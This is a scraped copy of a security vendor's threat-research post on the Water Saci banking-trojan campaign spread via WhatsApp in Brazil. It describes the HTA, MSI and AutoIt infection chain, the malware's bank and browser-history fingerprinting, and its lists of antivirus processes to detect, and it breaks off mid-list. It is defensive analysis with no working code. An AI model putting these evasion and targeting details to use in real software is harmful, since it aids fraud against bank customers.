{"id":59779,"date":"2025-12-02T00:00:00","date_gmt":"2025-12-02T00:00:00","guid":{"rendered":"urn:uuid:02e593c3-80d7-c25c-69ae-d408b529fdbb"},"modified":"2025-12-02T00:00:00","modified_gmt":"2025-12-02T00:00:00","slug":"unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","title":{"rendered":"Unraveling Water Saci&#8217;s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80\"><!-- OneTrust Cookies Consent Notice start for trendmicro.com --><!-- OneTrust Cookies Consent Notice end for trendmicro.com --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <meta name=\"description\" content=\"Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil.\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2025-12-02\"> <meta property=\"article:tag\" content=\"phishing\"> <meta property=\"article:section\" content=\"research\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/water-saci.html\"> <title>Unraveling Water Saci&#8217;s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp | Trend Micro (US)<\/title> <link 
href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.47ce60d92d94610907e7a2cbd6fbca69.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.73d48bc3ed70be81f869353a9360ab96.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/water-saci.html\"><br \/>\n<meta property=\"og:title\" content=\"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp\"><br \/>\n<meta property=\"og:description\" content=\"Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/WaterSaci_thumbnail.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp\"><br \/>\n<meta name=\"twitter:description\" content=\"Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil.\"><br \/>\n<meta 
name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/WaterSaci_thumbnail.jpg\"> <meta name=\"user-country-code\" content=\"US\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.053520483853\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layers *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1296840809\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"12\">\n<div class=\"article-details\" role=\"heading\" readability=\"44\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Phishing<\/p>\n<p class=\"article-details__description\">Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil.<\/p>\n<p class=\"article-details__author-by\">By: Jeffrey Francis Bonaobra, Sarah Pearl Camiling, Joe Soares, Byron Gelera, Ian Kenefick, Emmanuel Panopio <time class=\"article-details__date\">Dec 02, 2025<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\"> <!--Add This--> <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" 
href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p> <!--Add to Folio--> <!--Subscribe--> <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div>\n<div class=\"richText\" readability=\"43.75554796859\">\n<div readability=\"34.032092864459\">\n<h2><span class=\"main-subtitle-black\"><span class=\"body-subhead-title\">Key takeaways<\/span><\/span><\/h2>\n<ul>\n<li><span class=\"rte-red-bullet\">The Water Saci campaign in Brazil has been observed using a highly layered attack chain that involves various file formats (including HTA files, ZIP archives, and PDFs), designed to bypass simple pattern-based detection and increase the complexity of analysis.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The attackers switched tactics by transitioning from their PowerShell-based propagation routine to a Python variant, which suggests an accelerated development pipeline. 
This newly observed variant allows for broader browser compatibility, object-oriented code structure, enhanced error handling, and faster automation of malware delivery through WhatsApp Web.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Evidence suggests that attackers may have used AI tools like LLMs to convert their malware propagation scripts from PowerShell to Python; this would explain their capabilities for batch messaging, improved error handling, and enhanced console output.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend Vision One\u2122 detects and blocks the IoCs discussed in this blog. Trend Micro customers can also access tailored hunting queries, threat insights, and intelligence reports to better understand and proactively defend against this campaign.<\/span><\/li>\n<\/ul>\n<p>Brazil has seen a recent surge of threats delivered via WhatsApp. As observed in our previously published research on <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/j\/self-propagating-malware-spreads-via-whatsapp.html\" target=\"_blank\">the SORVEPOTEL malware<\/a> and <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/j\/active-water-saci-campaign-whatsapp-update.html\" target=\"_blank\">the broader Water Saci campaign<\/a>, this popular platform has been used to launch sophisticated campaigns. Unsuspecting users receive convincing messages from trusted contacts, often crafted to exploit social engineering tactics and encourage interaction with malicious content. 
While the core objectives of these campaigns remain consistent, this wave showcases advanced techniques in infection, persistence, and evasion, underscoring how legitimate platforms are increasingly being exploited to reach Brazilian targets more effectively.<\/p>\n<p>Their new multi-format attack chain and possible use of <a href=\"https:\/\/www.trendmicro.com\/en_us\/what-is\/ai.html\" target=\"_blank\">artificial intelligence (AI)<\/a> to convert propagation scripts from PowerShell to Python exemplifies a layered approach that has enabled Water Saci to bypass conventional security controls, exploit user trust across multiple channels, and ramp up their infection rates. As adversaries\u2019 techniques evolve, organizations must be prepared for the heightened risk posed by campaigns that combine technical complexity with AI-enhanced agility.<\/p>\n<h2><span class=\"body-subhead-title\">Multi-format malware delivery through WhatsApp messages<\/span><\/h2>\n<p>The initial stage of this campaign demonstrates a diverse set of entry points employed by threat actors to reach victims through WhatsApp. Users reported receiving messages from trusted contacts containing various forms of malicious attachments.<\/p>\n<p>Some users received compressed archive files, such as ZIP files containing harmful payloads (Figure 1). Others were targeted with messages encouraging them to download what appeared to be benign PDF documents, often accompanied by plausible lures like requests to update Adobe Reader for proper viewing (Figures 2 and 3).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci01.png\" alt=\"Figure 1. A WhatsApp message luring user to open the ZIP file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. 
A WhatsApp message luring user to open the ZIP file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci02.png\" alt=\"Figure 2. A WhatsApp message luring user to open the PDF file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. A WhatsApp message luring user to open the PDF file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci03.png\" alt=\"Figure 3. Blurred image luring the users to click\/update Adobe\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. Blurred image luring the users to click\/update Adobe<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>A notable subset of victims was targeted with a direct delivery of a malicious .hta file. Unlike ZIP or PDF formats, the .hta file executes its embedded script immediately upon opening, streamlining the infection process for the attacker. One detail observed in multiple cases was the download of files with names following the pattern <i>A-{random characters}.hta<\/i> directly from <i>web.whatsapp[.]com<\/i> as shown in the Trend Vision One\u2122 telemetry logs in Figure 4.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci04.png\" alt=\"Figure 4. Malicious HTA file \"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. 
Malicious HTA file <\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\">\n<div>\n<p><span class=\"body-subhead-title\">Technical analysis<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci05.png\" alt=\"Figure 5. Attack chain\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Attack chain<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38.5\">\n<div readability=\"22\">\n<p><b>Initial vector &#8211; HTA file<\/b><\/p>\n<p>The infection chain begins when the user executes a malicious HTA file, which contains an embedded Visual Basic (VB) script that utilizes two layers of obfuscation to evade detection and hinder analysis. Once this script is deobfuscated, it reveals commands to create a batch file at <i>C:\\temp\\instalar.bat<\/i> which, if executed, connects to the attacker\u2019s command-and-control (C&amp;C) server to download an MSI installer and an automation (Python) script along with its supporting components. &nbsp;<\/p>\n<p><b>Banking trojan &#8211; First stage<\/b><\/p>\n<p>Following execution of the batch file, the infection chain continues with the download and installation of the MSI package. This installer serves as the primary vehicle for delivering the banking trojan and initiating its malicious activities on the compromised system (Figure 6).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci06.png\" alt=\"Figure 6. MSI Installation leading to the banking trojan payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. 
MSI Installation leading to the banking trojan payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div class=\"responsive-table-wrap\" readability=\"19\">\n<p>Upon inspection, the MSI package is found to contain several key components, described in more detail in Table 1:<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"624\">\n<tbody readability=\"3.5\">\n<tr>\n<td><b>File name<\/b><\/td>\n<td width=\"507\"><b>Description<\/b><\/td>\n<\/tr>\n<tr>\n<td>DaXGkoD7.exe<\/td>\n<td width=\"507\">AutoIt interpreter<\/td>\n<\/tr>\n<tr>\n<td>Ons7rxGC.log<\/td>\n<td width=\"507\">Compiled AutoIt script<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>run.vbs<\/td>\n<td width=\"507\">Initial launcher for AutoIt<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>starter.bat<\/td>\n<td width=\"507\">Batch file to launch AutoIt in a specified folder<\/td>\n<\/tr>\n<tr>\n<td>ucJDpQ.tda<\/td>\n<td width=\"507\">Encrypted PE payload<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td>fKmkzW.dmp<\/td>\n<td width=\"507\">Alternative encrypted PE payload (<i>If ucJDpQ.tda is missing, fKmkzW.dmp serves as the payload)<\/i><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center><\/p>\n<p><span class=\"rte-icon-component-text\">Table 1. Files in the MSI package<\/span><\/p>\n<p>The installer leverages a custom action to execute the included VB script (<i>run.vbs<\/i>), as shown in Figure 7. The script launches the AutoIt interpreter (<i>DaXGkoD7.exe<\/i>) to run the compiled AutoIt script (<i>Ons7rxGC.log<\/i>), shown in Figure 8. This process ultimately leads to the unpacking and activation of the final banking trojan payload hidden within the package.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci07.png\" alt=\"Figure 7. 
The MSI installer initially executes the VB script using CustomAction\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. The MSI installer initially executes the VB script using CustomAction<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci08.png\" alt=\"Figure 8. The VB script initiates the AutoIt interpreter (DaXGkoD7.exe), which then runs the compiled AutoIt payload (ONs7rxGC.log)\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. The VB script initiates the AutoIt interpreter (DaXGkoD7.exe), which then runs the compiled AutoIt payload (ONs7rxGC.log)<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The AutoIt script checks if it\u2019s being executed for the first time then notifies a remote server (Figure 9). If the marker file <i>executed.dat<\/i> does not exist, the function sends a notification to a specified URL and creates the marker file with a timestamp. This mechanism ensures that the notification is triggered only once during the first execution.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci09.png\" alt=\"Figure 9. AutoIt script initializing first-execution logic with remote notification\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. AutoIt script initializing first-execution logic with remote notification<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>On other AutoIt scripts we found from infection cases, the scripts start by checking the system language. 
As shown in Figure 10, it verifies if Windows is set to Portuguese (Brazil) by comparing its language code (0416). If not, it shows an error message with the detected language and exits the program. A helper function translates language codes into readable names like Portuguese (Portugal), English (US), or Spanish (Spain).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci10.png\" alt=\"Figure 10. Language verification routine ensuring Windows is set to Portuguese (Brazil)\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. Language verification routine ensuring Windows is set to Portuguese (Brazil)<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The script then scans the user\u2019s system for banking-related activity (Figure 11), compiles the findings into a list, and sends the data to a C&amp;C server. The first function, <i>DETECTARBANCO<\/i>, checks for the presence of specific directories associated with Brazilian banking applications (Table 2). If these folders exist, the script records the corresponding bank names, effectively fingerprinting which financial institutions the user interacts with. In Brazil, accessing most major banks requires security modules developed by independent companies as an attempt to protect end users from client-side fraud. Attackers know this and use it as a reliable method to guess the victim\u2019s primary bank.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci11.png\" alt=\"Figure 11. 
Checking for installed Brazilian banking applications\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 11. Checking for installed Brazilian banking applications<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\"> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"8\">\n<tr readability=\"2\">\n<td width=\"241\" valign=\"top\"><b>File path<\/b><\/td>\n<td width=\"382\" valign=\"top\"><b>Associated banking applications<\/b><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"241\" valign=\"top\">C:\\Program Files (x86)\\scpbrad<\/td>\n<td width=\"382\" valign=\"top\">Bradesco banking software<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"241\" valign=\"top\">C:\\Program Files\\Warsaw<\/td>\n<td width=\"382\" valign=\"top\">Warsaw security module deployed by Banco do Brasil (BB) and Caixa Econ\u00f4mica Federal (CEF)<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"241\" valign=\"top\">C:\\Program Files\\Topaz OFD<\/td>\n<td width=\"382\" valign=\"top\">Topaz OFD anti-fraud module deployed by Banco do Brasil (BB) and Caixa Econ\u00f4mica Federal (CEF)<\/td>\n<\/tr>\n<tr>\n<td width=\"241\" valign=\"top\">C:\\Sicoobnet<\/td>\n<td width=\"382\" valign=\"top\">Sicoob banking software<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"241\" valign=\"top\">AppData\\Local\\Aplicativo Itau<\/td>\n<td width=\"382\" valign=\"top\">Ita\u00fa banking application<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 2. File paths associated with Brazilian banking applications<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>The second function, <i>VERIFICARHISTORICOCHROME()<\/i>, focuses on analyzing the user\u2019s Chrome browser history to identify visits to banking websites (Figure 12). 
It locates the Chrome history database within the user\u2019s profile directory, creates a temporary copy, and reads its contents. The function then searches for specific banking-related URLs (Table 3). If any of these URLs are found, the corresponding bank names are recorded. This technique allows the script to detect banking activity even if no banking software is installed on the system.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci12.png\" alt=\"Figure 12. Checking Chrome browser history for visited banking websites\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 12. Checking Chrome browser history for visited banking websites<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\">\n<div> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"3\">\n<tr>\n<td width=\"206\" valign=\"top\"><b>Targeted URLs<\/b><\/td>\n<td width=\"310\" valign=\"top\"><b>Associated bank<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"206\" valign=\"top\">www[.]santander[.]com[.]br<\/td>\n<td width=\"310\" valign=\"top\">Santander<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"206\" valign=\"top\">autoatendimento[.]bb[.]com[.]br<\/td>\n<td width=\"310\" valign=\"top\">Banco do Brasil<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"206\" valign=\"top\">internetbanking[.]caixa[.]gov[.]br<\/td>\n<td width=\"310\" valign=\"top\">Caixa Econ\u00f4mica Federal<\/td>\n<\/tr>\n<tr>\n<td width=\"206\" valign=\"top\">www[.]sicredi[.]com[.]br<\/td>\n<td width=\"310\" valign=\"top\">Sicredi<\/td>\n<\/tr>\n<tr>\n<td width=\"206\" valign=\"top\">banco[.]bradesco<\/td>\n<td width=\"310\" valign=\"top\">Bradesco<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Table 3. 
Specific banking-related URLs the second function searches for<\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>After identifying installed banking applications and analyzing browser history, the script moves on to another critical reconnaissance step: checking for antivirus and security software. It inspects running processes for executables linked to the following security software:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">360sd.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">360tray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ashDisp.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">aswidsagent.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avast.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">AvastSvc.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">AvastUI.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avgnt.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avgui.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avguix.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avp.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avpui.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">bdagent.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ccapp.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ccSvcHst.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">cfp.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">cmdagent.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">egui.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">eguiProxy.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ekrn.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">fshoster32.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">kavtray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">klwtblfs.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mbam.exe<\/span><\/li>\n<li><span 
class=\"rte-red-bullet\">MBAMService.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mbamtray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mcshield.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Mcshield.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mcuicnt.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">MSASCui.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">MSASCuiL.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">MsMpEng.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">NisSrv.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ns.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">PSUAMain.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">PSANHost.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SAVADMINSERVICE.EXE<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SAVService.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">seccenter.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SecurityHealthSystray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">SophosUI.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vkise.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vsserv.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">WRSA.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">zatray.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">ZAPrivacyService.exe<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The script also iterates through the Windows Uninstall registry keys, searching for the following keywords related to antivirus and security software:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">360<\/span><\/li>\n<li><span class=\"rte-red-bullet\">anti-virus<\/span><\/li>\n<li><span class=\"rte-red-bullet\">antivirus<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avast<\/span><\/li>\n<li><span class=\"rte-red-bullet\">avg<\/span><\/li>\n<li><span 
class=\"rte-red-bullet\">bitdefender<\/span><\/li>\n<li><span class=\"rte-red-bullet\">comodo<\/span><\/li>\n<li><span class=\"rte-red-bullet\">defender<\/span><\/li>\n<li><span class=\"rte-red-bullet\">eset<\/span><\/li>\n<li><span class=\"rte-red-bullet\">f-secure<\/span><\/li>\n<li><span class=\"rte-red-bullet\">kaspersky<\/span><\/li>\n<li><span class=\"rte-red-bullet\">malwarebytes<\/span><\/li>\n<li><span class=\"rte-red-bullet\">mcafee<\/span><\/li>\n<li><span class=\"rte-red-bullet\">norton<\/span><\/li>\n<li><span class=\"rte-red-bullet\">panda<\/span><\/li>\n<li><span class=\"rte-red-bullet\">security<\/span><\/li>\n<li><span class=\"rte-red-bullet\">sophos<\/span><\/li>\n<li><span class=\"rte-red-bullet\">trend micro<\/span><\/li>\n<li><span class=\"rte-red-bullet\">webroot<\/span><\/li>\n<li><span class=\"rte-red-bullet\">zonealarm<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>In addition to collecting details about installed banking applications, security software, and visited banking websites, the script also gathers the following information, which is then sent to a remote C&amp;C server:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Computer name<\/span><\/li>\n<li><span class=\"rte-red-bullet\">OS version, architecture and build number<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Username<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Local IP address<\/span><\/li>\n<li><span class=\"rte-red-bullet\">External IP address<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Current date and time<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Windows version<\/span><\/li>\n<li><span class=\"rte-red-bullet\">CPU model<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Total physical memory<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>The script monitors an array of keywords for Brazilian banks, 
payment platforms, and cryptocurrency exchanges\/wallets. It enumerates all open windows and then searches for keyword matches.<\/p>\n<p>Targeted entities include:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Brazilian banks:<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Banco do Brasil<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">BMG<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Bradesco<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">BS2<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">BTG Pactual<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">CEF<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Ita\u00fa<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Santander<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Sicoob<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Sicredi<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>Payment platform:<\/b>&nbsp;<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Mercado Pago<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\"><b>International exchanges:<\/b><\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Binance<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Bitfinex<\/span><\/li>\n<li><span 